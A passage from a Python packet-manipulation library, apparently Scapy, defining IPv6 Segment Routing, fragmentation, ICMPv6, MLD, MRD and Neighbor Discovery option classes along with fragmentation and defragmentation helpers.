1018 cls.registered_sr_tlv[cls.type.default] = cls
1019
1020 @classmethod
1021 def dispatch_hook(cls, pkt=None, *args, **kargs):
1022 if pkt:
1023 tmp_type = ord(pkt[:1])
1024 return cls.registered_sr_tlv.get(tmp_type, cls)
1025 return cls
1026
1027
1028class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
1029 name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
1030 # draft-ietf-6man-segment-routing-header-06 3.1.1
1031 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs),
1032 ByteField("len", 18),
1033 ByteField("reserved", 0),
1034 ByteField("flags", 0),
1035 IP6Field("ingress_node", "::1")]
1036
1037
1038class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
1039 name = "IPv6 Option Header Segment Routing - Egress Node TLV"
1040 # draft-ietf-6man-segment-routing-header-06 3.1.2
1041 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
1042 ByteField("len", 18),
1043 ByteField("reserved", 0),
1044 ByteField("flags", 0),
1045 IP6Field("egress_node", "::1")]
1046
1047
1048class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
1049 name = "IPv6 Option Header Segment Routing - Pad1 TLV"
1050 # RFC8754 sect 2.1.1.1, Pad1 is a single byte
1051 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs)]
1052
1053
1054class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
1055 name = "IPv6 Option Header Segment Routing - PadN TLV"
1056 # RFC8754 sect 2.1.1.2
1057 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
1058 FieldLenField("len", None, length_of="padding", fmt="B"),
1059 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1060
1061
1062class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
1063 name = "IPv6 Option Header Segment Routing - HMAC TLV"
1064 # RFC8754 sect 2.1.2
1065 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
1066 FieldLenField("len", None, length_of="hmac",
1067 adjust=lambda _, x: x + 48),
1068 BitField("D", 0, 1),
1069 BitField("reserved", 0, 15),
1070 IntField("hmackeyid", 0),
1071 StrLenField("hmac", "",
1072 length_from=lambda pkt: pkt.len - 48)]
1073
1074
1075class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
1076 name = "IPv6 Option Header Segment Routing"
1077 # RFC8754 sect 2. + flag bits from draft 06
1078 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1079 ByteField("len", None),
1080 ByteField("type", 4),
1081 ByteField("segleft", None),
1082 ByteField("lastentry", None),
1083 BitField("unused1", 0, 1),
1084 BitField("protected", 0, 1),
1085 BitField("oam", 0, 1),
1086 BitField("alert", 0, 1),
1087 BitField("hmac", 0, 1),
1088 BitField("unused2", 0, 3),
1089 ShortField("tag", 0),
1090 IP6ListField("addresses", ["::1"],
1091 count_from=lambda pkt: (pkt.lastentry + 1)),
1092 PacketListField("tlv_objects", [],
1093 IPv6ExtHdrSegmentRoutingTLV,
1094 length_from=lambda pkt: 8 * pkt.len - 16 * (
1095 pkt.lastentry + 1
1096 ))]
1097
1098 overload_fields = {IPv6: {"nh": 43}}
1099
1100 def post_build(self, pkt, pay):
1101
1102 if self.len is None:
1103
1104 # The extension must be align on 8 bytes
1105 tmp_mod = (-len(pkt) + 8) % 8
1106 if tmp_mod == 1:
1107 tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
1108 pkt += raw(tlv)
1109 elif tmp_mod >= 2:
1110 # Add the padding extension
1111 tmp_pad = b"\x00" * (tmp_mod - 2)
1112 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
1113 pkt += raw(tlv)
1114
1115 tmp_len = (len(pkt) - 8) // 8
1116 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
1117
1118 if self.segleft is None:
1119 tmp_len = len(self.addresses)
1120 if tmp_len:
1121 tmp_len -= 1
1122 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
1123
1124 if self.lastentry is None:
1125 lastentry = len(self.addresses)
1126 if lastentry == 0:
1127 warning(
1128 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
1129 )
1130 else:
1131 lastentry -= 1
1132 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
1133
1134 return _IPv6ExtHdr.post_build(self, pkt, pay)
1135
1136
1137# Fragmentation Header #
1138
1139class IPv6ExtHdrFragment(_IPv6ExtHdr):
1140 name = "IPv6 Extension Header - Fragmentation header"
1141 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1142 BitField("res1", 0, 8),
1143 BitField("offset", 0, 13),
1144 BitField("res2", 0, 2),
1145 BitField("m", 0, 1),
1146 IntField("id", None)]
1147 overload_fields = {IPv6: {"nh": 44}}
1148
1149 def guess_payload_class(self, p):
1150 if self.offset > 0:
1151 return Raw
1152 else:
1153 return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1154
1155
1156def defragment6(packets):
1157 """
1158 Performs defragmentation of a list of IPv6 packets. Packets are reordered.
1159 Crap is dropped. What lacks is completed by 'X' characters.
1160 """
1161
1162 # Remove non fragments
1163 lst = [x for x in packets if IPv6ExtHdrFragment in x]
1164 if not lst:
1165 return []
1166
1167 id = lst[0][IPv6ExtHdrFragment].id
1168
1169 llen = len(lst)
1170 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
1171 if len(lst) != llen:
1172 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501
1173
1174 # reorder fragments
1175 res = []
1176 while lst:
1177 min_pos = 0
1178 min_offset = lst[0][IPv6ExtHdrFragment].offset
1179 for p in lst:
1180 cur_offset = p[IPv6ExtHdrFragment].offset
1181 if cur_offset < min_offset:
1182 min_pos = 0
1183 min_offset = cur_offset
1184 res.append(lst[min_pos])
1185 del lst[min_pos]
1186
1187 # regenerate the fragmentable part
1188 fragmentable = b""
1189 frag_hdr_len = 8
1190 for p in res:
1191 q = p[IPv6ExtHdrFragment]
1192 offset = 8 * q.offset
1193 if offset != len(fragmentable):
1194 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501
1195 frag_data_len = p[IPv6].plen
1196 if frag_data_len is not None:
1197 frag_data_len -= frag_hdr_len
1198 fragmentable += b"X" * (offset - len(fragmentable))
1199 fragmentable += raw(q.payload)[:frag_data_len]
1200
1201 # Regenerate the unfragmentable part.
1202 q = res[0].copy()
1203 nh = q[IPv6ExtHdrFragment].nh
1204 q[IPv6ExtHdrFragment].underlayer.nh = nh
1205 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
1206 del q[IPv6ExtHdrFragment].underlayer.payload
1207 q /= conf.raw_layer(load=fragmentable)
1208 del q.plen
1209
1210 if q[IPv6].underlayer:
1211 q[IPv6] = IPv6(raw(q[IPv6]))
1212 else:
1213 q = IPv6(raw(q))
1214 return q
1215
1216
1217def fragment6(pkt, fragSize):
1218 """
1219 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
1220 expected maximum size of fragment data (MTU). The list of packets is
1221 returned.
1222
1223 If packet does not contain an IPv6ExtHdrFragment class, it is added to
1224 first IPv6 layer found. If no IPv6 layer exists packet is returned in
1225 result list unmodified.
1226 """
1227
1228 pkt = pkt.copy()
1229
1230 if IPv6ExtHdrFragment not in pkt:
1231 if IPv6 not in pkt:
1232 return [pkt]
1233
1234 layer3 = pkt[IPv6]
1235 data = layer3.payload
1236 frag = IPv6ExtHdrFragment(nh=layer3.nh)
1237
1238 layer3.remove_payload()
1239 del layer3.nh
1240 del layer3.plen
1241
1242 frag.add_payload(data)
1243 layer3.add_payload(frag)
1244
1245 # If the payload is bigger than 65535, a Jumbo payload must be used, as
1246 # an IPv6 packet can't be bigger than 65535 bytes.
1247 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
1248 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501
1249 return []
1250
1251 s = raw(pkt) # for instantiation to get upper layer checksum right
1252
1253 if len(s) <= fragSize:
1254 return [pkt]
1255
1256 # Fragmentable part : fake IPv6 for Fragmentable part length computation
1257 fragPart = pkt[IPv6ExtHdrFragment].payload
1258 tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
1259 fragPartLen = len(tmp) - 40 # basic IPv6 header length
1260 fragPartStr = s[-fragPartLen:]
1261
1262 # Grab Next Header for use in Fragment Header
1263 nh = pkt[IPv6ExtHdrFragment].nh
1264
1265 # Keep fragment header
1266 fragHeader = pkt[IPv6ExtHdrFragment]
1267 del fragHeader.payload # detach payload
1268
1269 # Unfragmentable Part
1270 unfragPartLen = len(s) - fragPartLen - 8
1271 unfragPart = pkt
1272 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
1273
1274 # Cut the fragmentable part to fit fragSize. Inner fragments have
1275 # a length that is an integer multiple of 8 octets. last Frag MTU
1276 # can be anything below MTU
1277 lastFragSize = fragSize - unfragPartLen - 8
1278 innerFragSize = lastFragSize - (lastFragSize % 8)
1279
1280 if lastFragSize <= 0 or innerFragSize == 0:
1281 warning("Provided fragment size value is too low. " +
1282 "Should be more than %d" % (unfragPartLen + 8))
1283 return [unfragPart / fragHeader / fragPart]
1284
1285 remain = fragPartStr
1286 res = []
1287 fragOffset = 0 # offset, incremeted during creation
1288 fragId = random.randint(0, 0xffffffff) # random id ...
1289 if fragHeader.id is not None: # ... except id provided by user
1290 fragId = fragHeader.id
1291 fragHeader.m = 1
1292 fragHeader.id = fragId
1293 fragHeader.nh = nh
1294
1295 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
1296 while True:
1297 if (len(remain) > lastFragSize):
1298 tmp = remain[:innerFragSize]
1299 remain = remain[innerFragSize:]
1300 fragHeader.offset = fragOffset # update offset
1301 fragOffset += (innerFragSize // 8) # compute new one
1302 if IPv6 in unfragPart:
1303 unfragPart[IPv6].plen = None
1304 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
1305 res.append(tempo)
1306 else:
1307 fragHeader.offset = fragOffset # update offSet
1308 fragHeader.m = 0
1309 if IPv6 in unfragPart:
1310 unfragPart[IPv6].plen = None
1311 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
1312 res.append(tempo)
1313 break
1314 return res
1315
1316
1317#############################################################################
1318#############################################################################
1319# ICMPv6* Classes #
1320#############################################################################
1321#############################################################################
1322
1323
1324icmp6typescls = {1: "ICMPv6DestUnreach",
1325 2: "ICMPv6PacketTooBig",
1326 3: "ICMPv6TimeExceeded",
1327 4: "ICMPv6ParamProblem",
1328 128: "ICMPv6EchoRequest",
1329 129: "ICMPv6EchoReply",
1330 130: "ICMPv6MLQuery", # MLDv1 or MLDv2
1331 131: "ICMPv6MLReport",
1332 132: "ICMPv6MLDone",
1333 133: "ICMPv6ND_RS",
1334 134: "ICMPv6ND_RA",
1335 135: "ICMPv6ND_NS",
1336 136: "ICMPv6ND_NA",
1337 137: "ICMPv6ND_Redirect",
1338 # 138: Do Me - RFC 2894 - Seems painful
1339 139: "ICMPv6NIQuery",
1340 140: "ICMPv6NIReply",
1341 141: "ICMPv6ND_INDSol",
1342 142: "ICMPv6ND_INDAdv",
1343 143: "ICMPv6MLReport2",
1344 144: "ICMPv6HAADRequest",
1345 145: "ICMPv6HAADReply",
1346 146: "ICMPv6MPSol",
1347 147: "ICMPv6MPAdv",
1348 # 148: Do Me - SEND related - RFC 3971
1349 # 149: Do Me - SEND related - RFC 3971
1350 151: "ICMPv6MRD_Advertisement",
1351 152: "ICMPv6MRD_Solicitation",
1352 153: "ICMPv6MRD_Termination",
1353 # 154: Do Me - FMIPv6 Messages - RFC 5568
1354 155: "ICMPv6RPL", # RFC 6550
1355 }
1356
1357icmp6typesminhdrlen = {1: 8,
1358 2: 8,
1359 3: 8,
1360 4: 8,
1361 128: 8,
1362 129: 8,
1363 130: 24,
1364 131: 24,
1365 132: 24,
1366 133: 8,
1367 134: 16,
1368 135: 24,
1369 136: 24,
1370 137: 40,
1371 # 139:
1372 # 140
1373 141: 8,
1374 142: 8,
1375 143: 8,
1376 144: 8,
1377 145: 8,
1378 146: 8,
1379 147: 8,
1380 151: 8,
1381 152: 4,
1382 153: 4,
1383 155: 4
1384 }
1385
1386icmp6types = {1: "Destination unreachable",
1387 2: "Packet too big",
1388 3: "Time exceeded",
1389 4: "Parameter problem",
1390 100: "Private Experimentation",
1391 101: "Private Experimentation",
1392 128: "Echo Request",
1393 129: "Echo Reply",
1394 130: "MLD Query",
1395 131: "MLD Report",
1396 132: "MLD Done",
1397 133: "Router Solicitation",
1398 134: "Router Advertisement",
1399 135: "Neighbor Solicitation",
1400 136: "Neighbor Advertisement",
1401 137: "Redirect Message",
1402 138: "Router Renumbering",
1403 139: "ICMP Node Information Query",
1404 140: "ICMP Node Information Response",
1405 141: "Inverse Neighbor Discovery Solicitation Message",
1406 142: "Inverse Neighbor Discovery Advertisement Message",
1407 143: "MLD Report Version 2",
1408 144: "Home Agent Address Discovery Request Message",
1409 145: "Home Agent Address Discovery Reply Message",
1410 146: "Mobile Prefix Solicitation",
1411 147: "Mobile Prefix Advertisement",
1412 148: "Certification Path Solicitation",
1413 149: "Certification Path Advertisement",
1414 151: "Multicast Router Advertisement",
1415 152: "Multicast Router Solicitation",
1416 153: "Multicast Router Termination",
1417 155: "RPL Control Message",
1418 200: "Private Experimentation",
1419 201: "Private Experimentation"}
1420
1421
1422class _ICMPv6(Packet):
1423 name = "ICMPv6 dummy class"
1424 overload_fields = {IPv6: {"nh": 58}}
1425
1426 def post_build(self, p, pay):
1427 p += pay
1428 if self.cksum is None:
1429 chksum = in6_chksum(58, self.underlayer, p)
1430 p = p[:2] + struct.pack("!H", chksum) + p[4:]
1431 return p
1432
1433 def hashret(self):
1434 return self.payload.hashret()
1435
1436 def answers(self, other):
1437 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
1438 if (isinstance(self.underlayer, IPerror6) or
1439 isinstance(self.underlayer, _IPv6ExtHdr) and
1440 isinstance(other, _ICMPv6)):
1441 if not ((self.type == other.type) and
1442 (self.code == other.code)):
1443 return 0
1444 return 1
1445 return 0
1446
1447
1448class _ICMPv6Error(_ICMPv6):
1449 name = "ICMPv6 errors dummy class"
1450
1451 def guess_payload_class(self, p):
1452 return IPerror6
1453
1454
1455class ICMPv6Unknown(_ICMPv6):
1456 name = "Scapy6 ICMPv6 fallback class"
1457 fields_desc = [ByteEnumField("type", 1, icmp6types),
1458 ByteField("code", 0),
1459 XShortField("cksum", None),
1460 StrField("msgbody", "")]
1461
1462
1463# RFC 2460 #
1464
1465class ICMPv6DestUnreach(_ICMPv6Error):
1466 name = "ICMPv6 Destination Unreachable"
1467 fields_desc = [ByteEnumField("type", 1, icmp6types),
1468 ByteEnumField("code", 0, {0: "No route to destination",
1469 1: "Communication with destination administratively prohibited", # noqa: E501
1470 2: "Beyond scope of source address", # noqa: E501
1471 3: "Address unreachable",
1472 4: "Port unreachable"}),
1473 XShortField("cksum", None),
1474 ByteField("length", 0),
1475 X3BytesField("unused", 0),
1476 _ICMPExtensionPadField(),
1477 _ICMPExtensionField()]
1478 post_dissection = _ICMP_extpad_post_dissection
1479
1480
1481class ICMPv6PacketTooBig(_ICMPv6Error):
1482 name = "ICMPv6 Packet Too Big"
1483 fields_desc = [ByteEnumField("type", 2, icmp6types),
1484 ByteField("code", 0),
1485 XShortField("cksum", None),
1486 IntField("mtu", 1280)]
1487
1488
1489class ICMPv6TimeExceeded(_ICMPv6Error):
1490 name = "ICMPv6 Time Exceeded"
1491 fields_desc = [ByteEnumField("type", 3, icmp6types),
1492 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501
1493 1: "fragment reassembly time exceeded"}), # noqa: E501
1494 XShortField("cksum", None),
1495 ByteField("length", 0),
1496 X3BytesField("unused", 0),
1497 _ICMPExtensionPadField(),
1498 _ICMPExtensionField()]
1499 post_dissection = _ICMP_extpad_post_dissection
1500
1501
1502# The default pointer value is set to the next header field of
1503# the encapsulated IPv6 packet
1504
1505
1506class ICMPv6ParamProblem(_ICMPv6Error):
1507 name = "ICMPv6 Parameter Problem"
1508 fields_desc = [ByteEnumField("type", 4, icmp6types),
1509 ByteEnumField(
1510 "code", 0,
1511 {0: "erroneous header field encountered",
1512 1: "unrecognized Next Header type encountered",
1513 2: "unrecognized IPv6 option encountered",
1514 3: "first fragment has incomplete header chain"}),
1515 XShortField("cksum", None),
1516 IntField("ptr", 6)]
1517
1518
1519class ICMPv6EchoRequest(_ICMPv6):
1520 name = "ICMPv6 Echo Request"
1521 fields_desc = [ByteEnumField("type", 128, icmp6types),
1522 ByteField("code", 0),
1523 XShortField("cksum", None),
1524 XShortField("id", 0),
1525 XShortField("seq", 0),
1526 StrField("data", "")]
1527
1528 def mysummary(self):
1529 return self.sprintf("%name% (id: %id% seq: %seq%)")
1530
1531 def hashret(self):
1532 return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
1533
1534
1535class ICMPv6EchoReply(ICMPv6EchoRequest):
1536 name = "ICMPv6 Echo Reply"
1537 type = 129
1538
1539 def answers(self, other):
1540 # We could match data content between request and reply.
1541 return (isinstance(other, ICMPv6EchoRequest) and
1542 self.id == other.id and self.seq == other.seq and
1543 self.data == other.data)
1544
1545
1546# ICMPv6 Multicast Listener Discovery (RFC2710) #
1547
1548# tous les messages MLD sont emis avec une adresse source lien-locale
1549# -> Y veiller dans le post_build si aucune n'est specifiee
1550# La valeur de Hop-Limit doit etre de 1
1551# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1552# header. (The router alert option is necessary to cause routers to
1553# examine MLD messages sent to multicast addresses in which the router
1554# itself has no interest"
1555class _ICMPv6ML(_ICMPv6):
1556 fields_desc = [ByteEnumField("type", 130, icmp6types),
1557 ByteField("code", 0),
1558 XShortField("cksum", None),
1559 ShortField("mrd", 0),
1560 ShortField("reserved", 0),
1561 IP6Field("mladdr", "::")]
1562
1563# general queries are sent to the link-scope all-nodes multicast
1564# address ff02::1, with a multicast address field of 0 and a MRD of
1565# [Query Response Interval]
1566# Default value for mladdr is set to 0 for a General Query, and
1567# overloaded by the user for a Multicast Address specific query
1568# TODO : See what we can do to automatically include a Router Alert
1569# Option in a Destination Option Header.
1570
1571
1572class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
1573 name = "MLD - Multicast Listener Query"
1574 type = 130
1575 mrd = 10000 # 10s for mrd
1576 mladdr = "::"
1577 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1578
1579
1580# TODO : See what we can do to automatically include a Router Alert
1581# Option in a Destination Option Header.
1582class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
1583 name = "MLD - Multicast Listener Report"
1584 type = 131
1585 overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
1586
1587 def answers(self, query):
1588 """Check the query type"""
1589 return ICMPv6MLQuery in query
1590
1591# When a node ceases to listen to a multicast address on an interface,
1592# it SHOULD send a single Done message to the link-scope all-routers
1593# multicast address (FF02::2), carrying in its multicast address field
1594# the address to which it is ceasing to listen
1595# TODO : See what we can do to automatically include a Router Alert
1596# Option in a Destination Option Header.
1597
1598
1599class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
1600 name = "MLD - Multicast Listener Done"
1601 type = 132
1602 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1603
1604
1605# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1606
1607class ICMPv6MLQuery2(_ICMPv6): # RFC 3810
1608 name = "MLDv2 - Multicast Listener Query"
1609 fields_desc = [ByteEnumField("type", 130, icmp6types),
1610 ByteField("code", 0),
1611 XShortField("cksum", None),
1612 ShortField("mrd", 10000),
1613 ShortField("reserved", 0),
1614 IP6Field("mladdr", "::"),
1615 BitField("Resv", 0, 4),
1616 BitField("S", 0, 1),
1617 BitField("QRV", 0, 3),
1618 ByteField("QQIC", 0),
1619 ShortField("sources_number", None),
1620 IP6ListField("sources", [],
1621 count_from=lambda pkt: pkt.sources_number)]
1622
1623 # RFC8810 - 4. Message Formats
1624 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1625
1626 def post_build(self, packet, payload):
1627 """Compute the 'sources_number' field when needed"""
1628 if self.sources_number is None:
1629 srcnum = struct.pack("!H", len(self.sources))
1630 packet = packet[:26] + srcnum + packet[28:]
1631 return _ICMPv6.post_build(self, packet, payload)
1632
1633
1634class ICMPv6MLDMultAddrRec(Packet):
1635 name = "ICMPv6 MLDv2 - Multicast Address Record"
1636 fields_desc = [ByteField("rtype", 4),
1637 FieldLenField("auxdata_len", None,
1638 length_of="auxdata",
1639 fmt="B"),
1640 FieldLenField("sources_number", None,
1641 length_of="sources",
1642 adjust=lambda p, num: num // 16),
1643 IP6Field("dst", "::"),
1644 IP6ListField("sources", [],
1645 length_from=lambda p: 16 * p.sources_number),
1646 StrLenField("auxdata", "",
1647 length_from=lambda p: p.auxdata_len)]
1648
1649 def default_payload_class(self, packet):
1650 """Multicast Address Record followed by another one"""
1651 return self.__class__
1652
1653
1654class ICMPv6MLReport2(_ICMPv6): # RFC 3810
1655 name = "MLDv2 - Multicast Listener Report"
1656 fields_desc = [ByteEnumField("type", 143, icmp6types),
1657 ByteField("res", 0),
1658 XShortField("cksum", None),
1659 ShortField("reserved", 0),
1660 ShortField("records_number", None),
1661 PacketListField("records", [],
1662 ICMPv6MLDMultAddrRec,
1663 count_from=lambda p: p.records_number)]
1664
1665 # RFC8810 - 4. Message Formats
1666 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
1667
1668 def post_build(self, packet, payload):
1669 """Compute the 'records_number' field when needed"""
1670 if self.records_number is None:
1671 recnum = struct.pack("!H", len(self.records))
1672 packet = packet[:6] + recnum + packet[8:]
1673 return _ICMPv6.post_build(self, packet, payload)
1674
1675 def answers(self, query):
1676 """Check the query type"""
1677 return isinstance(query, ICMPv6MLQuery2)
1678
1679
1680# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1681
1682# TODO:
1683# - 04/09/06 troglocan : find a way to automatically add a router alert
1684# option for all MRD packets. This could be done in a specific
1685# way when IPv6 is the under layer with some specific keyword
1686# like 'exthdr'. This would allow to keep compatibility with
1687# providing IPv6 fields to be overloaded in fields_desc.
1688#
1689# At the moment, if user inserts an IPv6 Router alert option
1690# none of the IPv6 default values of IPv6 layer will be set.
1691
1692class ICMPv6MRD_Advertisement(_ICMPv6):
1693 name = "ICMPv6 Multicast Router Discovery Advertisement"
1694 fields_desc = [ByteEnumField("type", 151, icmp6types),
1695 ByteField("advinter", 20),
1696 XShortField("cksum", None),
1697 ShortField("queryint", 0),
1698 ShortField("robustness", 0)]
1699 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1700 # IPv6 Router Alert requires manual inclusion
1701
1702 def extract_padding(self, s):
1703 return s[:8], s[8:]
1704
1705
1706class ICMPv6MRD_Solicitation(_ICMPv6):
1707 name = "ICMPv6 Multicast Router Discovery Solicitation"
1708 fields_desc = [ByteEnumField("type", 152, icmp6types),
1709 ByteField("res", 0),
1710 XShortField("cksum", None)]
1711 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1712 # IPv6 Router Alert requires manual inclusion
1713
1714 def extract_padding(self, s):
1715 return s[:4], s[4:]
1716
1717
1718class ICMPv6MRD_Termination(_ICMPv6):
1719 name = "ICMPv6 Multicast Router Discovery Termination"
1720 fields_desc = [ByteEnumField("type", 153, icmp6types),
1721 ByteField("res", 0),
1722 XShortField("cksum", None)]
1723 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
1724 # IPv6 Router Alert requires manual inclusion
1725
1726 def extract_padding(self, s):
1727 return s[:4], s[4:]
1728
1729
1730# ICMPv6 Neighbor Discovery (RFC 2461) #
1731
1732icmp6ndopts = {1: "Source Link-Layer Address",
1733 2: "Target Link-Layer Address",
1734 3: "Prefix Information",
1735 4: "Redirected Header",
1736 5: "MTU",
1737 6: "NBMA Shortcut Limit Option", # RFC2491
1738 7: "Advertisement Interval Option",
1739 8: "Home Agent Information Option",
1740 9: "Source Address List",
1741 10: "Target Address List",
1742 11: "CGA Option", # RFC 3971
1743 12: "RSA Signature Option", # RFC 3971
1744 13: "Timestamp Option", # RFC 3971
1745 14: "Nonce option", # RFC 3971
1746 15: "Trust Anchor Option", # RFC 3971
1747 16: "Certificate Option", # RFC 3971
1748 17: "IP Address Option", # RFC 4068
1749 18: "New Router Prefix Information Option", # RFC 4068
1750 19: "Link-layer Address Option", # RFC 4068
1751 20: "Neighbor Advertisement Acknowledgement Option",
1752 21: "CARD Request Option", # RFC 4065/4066/4067
1753 22: "CARD Reply Option", # RFC 4065/4066/4067
1754 23: "MAP Option", # RFC 4140
1755 24: "Route Information Option", # RFC 4191
1756 25: "Recursive DNS Server Option",
1757 26: "IPv6 Router Advertisement Flags Option"
1758 }
1759
1760icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
1761 2: "ICMPv6NDOptDstLLAddr",
1762 3: "ICMPv6NDOptPrefixInfo",
1763 4: "ICMPv6NDOptRedirectedHdr",
1764 5: "ICMPv6NDOptMTU",
1765 6: "ICMPv6NDOptShortcutLimit",
1766 7: "ICMPv6NDOptAdvInterval",
1767 8: "ICMPv6NDOptHAInfo",
1768 9: "ICMPv6NDOptSrcAddrList",
1769 10: "ICMPv6NDOptTgtAddrList",
1770 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
1771 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
1772 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
1773 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
1774 # 15: Do Me,
1775 # 16: Do Me,
1776 17: "ICMPv6NDOptIPAddr",
1777 18: "ICMPv6NDOptNewRtrPrefix",
1778 19: "ICMPv6NDOptLLA",
1779 # 18: Do Me,
1780 # 19: Do Me,
1781 # 20: Do Me,
1782 # 21: Do Me,
1783 # 22: Do Me,
1784 23: "ICMPv6NDOptMAP",
1785 24: "ICMPv6NDOptRouteInfo",
1786 25: "ICMPv6NDOptRDNSS",
1787 26: "ICMPv6NDOptEFA",
1788 31: "ICMPv6NDOptDNSSL",
1789 37: "ICMPv6NDOptCaptivePortal",
1790 38: "ICMPv6NDOptPREF64",
1791 }
1792
1793icmp6ndraprefs = {0: "Medium (default)",
1794 1: "High",
1795 2: "Reserved",
1796 3: "Low"} # RFC 4191
1797
1798
1799class _ICMPv6NDGuessPayload:
1800 name = "Dummy ND class that implements guess_payload_class()"
1801
1802 def guess_payload_class(self, p):
1803 if len(p) > 1:
1804 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1805
1806
1807# Beginning of ICMPv6 Neighbor Discovery Options.
1808
1809class ICMPv6NDOptDataField(StrLenField):
1810 __slots__ = ["strip_zeros"]
1811
1812 def __init__(self, name, default, strip_zeros=False, **kwargs):
1813 super().__init__(name, default, **kwargs)
1814 self.strip_zeros = strip_zeros
1815
1816 def i2len(self, pkt, x):
1817 return len(self.i2m(pkt, x))
1818
1819 def i2m(self, pkt, x):
1820 r = (len(x) + 2) % 8
1821 if r:
1822 x += b"\x00" * (8 - r)
1823 return x
1824
1825 def m2i(self, pkt, x):
1826 if self.strip_zeros:
1827 x = x.rstrip(b"\x00")
1828 return x
1829
1830
1831class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
1832 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
1833 fields_desc = [ByteField("type", 0),
1834 FieldLenField("len", None, length_of="data", fmt="B",
1835 adjust=lambda pkt, x: (2 + x) // 8),
1836 ICMPv6NDOptDataField("data", "", strip_zeros=False,
1837 length_from=lambda pkt:
1838 8 * max(pkt.len, 1) - 2)]
1839
1840# NOTE: len includes type and len field. Expressed in unit of 8 bytes
1841# TODO: Revoir le coup du ETHER_ANY
1842
1843
1844class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
1845 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
1846 fields_desc = [ByteField("type", 1),
1847 ByteField("len", 1),
1848 SourceMACField("lladdr")]
1849
1850 def mysummary(self):
1851 return self.sprintf("%name% %lladdr%")
1852
1853
1854class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
1855 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1856 type = 2
1857
1858
1859class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
1860 name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
1861 fields_desc = [ByteField("type", 3),
1862 ByteField("len", 4),
1863 ByteField("prefixlen", 64),
1864 BitField("L", 1, 1),
1865 BitField("A", 1, 1),
1866 BitField("R", 0, 1),
1867 BitField("res1", 0, 5),
1868 XIntField("validlifetime", 0xffffffff),
1869 XIntField("preferredlifetime", 0xffffffff),
1870 XIntField("res2", 0x00000000),
1871 IP6Field("prefix", "::")]
1872
1873 def mysummary(self):
1874 return self.sprintf("%name% %prefix%/%prefixlen% "
1875 "On-link %L% Autonomous Address %A% "
1876 "Router Address %R%")
1877
1878# TODO: We should also limit the size of included packet to something
1879# like (initiallen - 40 - 2)
1880
1881
1882class TruncPktLenField(PacketLenField):
1883 def i2m(self, pkt, x):
1884 s = bytes(x)
